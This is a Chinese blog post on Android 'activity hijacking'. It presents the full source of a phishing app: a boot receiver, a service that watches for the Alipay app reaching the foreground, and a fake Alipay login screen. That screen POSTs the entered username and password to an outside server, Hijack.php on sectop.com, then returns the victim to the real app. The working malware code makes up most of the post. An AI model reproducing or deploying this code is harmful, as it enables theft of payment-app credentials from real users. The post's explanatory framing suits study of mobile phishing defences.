android安全-activity劫持

一、activity劫持简介

DEFCON-19上公布的,原文见
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt

android运行时,会在很多activity中进行切换,它自身维护着一个activity的历史栈,用于在用户点击back时,恢复前一个activity,栈顶指向当前显示的activity。

原文如下:

http://developer.android.com/guide/topics/fundamentals/tasks-and-back-stack.html

在我们使用intent开启activity时,intent有一个选项FLAG_ACTIVITY_NEW_TASK,可以使得这个activity位于栈顶

http://developer.android.com/reference/android/content/Intent.html#FLAG_ACTIVITY_NEW_TASK

如果我们注册一个receiver,响应android.intent.action.BOOT_COMPLETED,使得开启启动一个service;这个service,会启动一个计时器,不停枚举当前进程中是否有预设的进程启动,如果发现有预设进程,则使用FLAG_ACTIVITY_NEW_TASK启动自己的钓鱼界面,截获正常应用的登录凭证。

 

二、实例

androidmanifest.xml

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<? xml version = "1.0" encoding = "utf-8" ?>
< manifest xmlns:android = "http://schemas.android.com/apk/res/android"
       package = "com.xiaod.Hijack"
       android:versionCode = "1"
       android:versionName = "1.0" >
     < uses-sdk android:minSdkVersion = "3" />
     < uses-permission android:name = "android.permission.RECEIVE_BOOT_COMPLETED" ></ uses-permission >
     < uses-permission android:name = "android.permission.INTERNET" />
     < application android:icon = "@drawable/icon" android:label = "@string/app_name" android:name = ".HijackApplication" >
         < activity android:name = ".HijackActivity"
                   android:label = "@string/app_name" >
             < intent-filter >
                 < action android:name = "android.intent.action.MAIN" />
                 < category android:name = "android.intent.category.LAUNCHER" />
             </ intent-filter >
         </ activity >
         < activity android:name = ".AlipayLogin" android:noHistory = "true" android:windowSoftInputMode = "adjustResize" />
       < service android:name = ".HijackService" android:label = "Hijack Service" >
             < intent-filter >
                 < action android:name = "com.xiaod.Hijack.service.Hijack" />
             </ intent-filter >
         </ service >
         < receiver
         android:name = ".HijackReceiver"
         android:enabled = "true"
         android:exported = "true"
         android:label = "Hijack Receiver" >
             < intent-filter >
                 < action android:name = "android.intent.action.BOOT_COMPLETED" />
             </ intent-filter >
         </ receiver >
     </ application >
</ manifest >

HijackReceiver.java 用于开机启动HijackService

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package com.xiaod.Hijack;
 
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
 
public class HijackReceiver extends BroadcastReceiver{
 
     @Override
     public void onReceive(Context context, Intent intent) {
         if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED" )) {
             Intent serviceIntent = new Intent(context, HijackService. class );
             context.startService(serviceIntent);
         }
     }
}

HijackService.java用于判断正常应用是否启动,如果启动则开启劫持activity

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
package com.xiaod.Hijack;
 
import java.util.HashMap;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;
 
import android.app.ActivityManager;
import android.app.ActivityManager.RunningAppProcessInfo;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.util.Log;
 
public class HijackService extends Service{
     Timer mTimer = new Timer();
     //新建一个定时任务
     TimerTask mTimerTask = new TimerTask() {
         @Override
         public void run() {
             // TODO Auto-generated method stub
             //获取当前运行的进程列表
             ActivityManager activityManager = (ActivityManager) getSystemService( Context.ACTIVITY_SERVICE );
             List<RunningAppProcessInfo> appProcesses = activityManager.getRunningAppProcesses();
 
             //枚举进程
             for (RunningAppProcessInfo appProcess : appProcesses) {
                 //如果APP在前台
                 if (appProcess.importance == RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
                     //APP是否在需要劫持的列表中
                     if (mVictims.containsKey(appProcess.processName)) {
                         if (((HijackApplication)getApplication()).getHasHijackStart() == false )
                         {
                             Intent dialogIntent = new Intent(getBaseContext(), mVictims.get(appProcess.processName));
                             //设置启动的activity位于栈顶
                             dialogIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                             getApplication().startActivity(dialogIntent);
                             ((HijackApplication)getApplication()).setHasHijackStart( true );
                         }
                     }
                 }
             }
             Log.e( "HijackService_TimerTask" , "here" );
         }
 
     };
     HashMap<String,Class<?>> mVictims = new HashMap<String,Class<?>>();
     long delay = 1000 ;
     long period = 1000 ;
 
     @Override
     public void onStart(Intent intent, int startid) {
 
         //设置需要劫持的应用
         mVictims.put( "com.eg.android.AlipayGphone" , AlipayLogin. class );
         //开启计时任务
         mTimer.scheduleAtFixedRate(mTimerTask, delay, period);
     }
 
     @Override
     public IBinder onBind(Intent arg0) {
         // TODO Auto-generated method stub
         return null ;
     }
}

AlipayLogin.java 是伪造的界面,用于获取用户凭证并发送到指定地址,并返回正常应用

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
package com.xiaod.Hijack;
 
import java.util.ArrayList;
import java.util.List;
 
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.protocol.HTTP;
 
import android.app.Activity;
import android.os.Bundle;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.Window;
import android.widget.Button;
import android.widget.EditText;
 
public class AlipayLogin extends Activity {
     private Button mBtnLogin;
     private Button mBtnReg;
     private EditText mEdtUser;
     private EditText mEdtPwd;
     @Override
     public void onCreate(Bundle savedInstanceState) {
         super .onCreate(savedInstanceState);
         requestWindowFeature(Window.FEATURE_NO_TITLE);
         setContentView(R.layout.alipay_login);      
 
         mBtnLogin = (Button) findViewById(R.id.btn_login);
         mBtnReg = (Button) findViewById(R.id.btn_reg);
         mEdtUser = (EditText) findViewById(R.id.et_user);
         mEdtPwd = (EditText) findViewById(R.id.et_pwd);
 
         mBtnLogin.setOnClickListener( new OnClickListener() {
 
             @Override
             public void onClick(View v) {
                 // TODO Auto-generated method stub
                 sendInfo(mEdtUser.getText().toString(), mEdtPwd.getText().toString());
                 moveTaskToBack( true );
             }
 
         });
 
         mBtnReg.setOnClickListener( new OnClickListener() {
 
             @Override
             public void onClick(View v) {
                 // TODO Auto-generated method stub
                 sendInfo(mEdtUser.getText().toString(), mEdtPwd.getText().toString());
                 moveTaskToBack( true );
             }
 
         });
     }
     public void onBackPressed() {
         moveTaskToBack( true );
     }
 
     private boolean sendInfo(String user, String pwd) {
         HttpPost request = new HttpPost( "http://www.sectop.com/Hijack.php" );
         List<NameValuePair> params = new ArrayList<NameValuePair>();
         params.add( new BasicNameValuePair( "user" , user));
         params.add( new BasicNameValuePair( "pwd" , pwd));
 
         try {
             request.setEntity( new UrlEncodedFormEntity(params, HTTP.UTF_8));
             HttpResponse response = new DefaultHttpClient().execute(request);
             if (response.getStatusLine().getStatusCode() == 200 ) {
                 return true ;
             }
             else {
                 return false ;
             }
         } catch (Exception e) {
         }
         return false ;
     }
}

演示效果如下:

启动正常应用

 

这时恶意的后台service启动了伪造的activity

当用户输入凭证之后

 

恶意activity记录下凭证,并跳回到正常应用

在远端服务器已经记录下了用户凭证

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值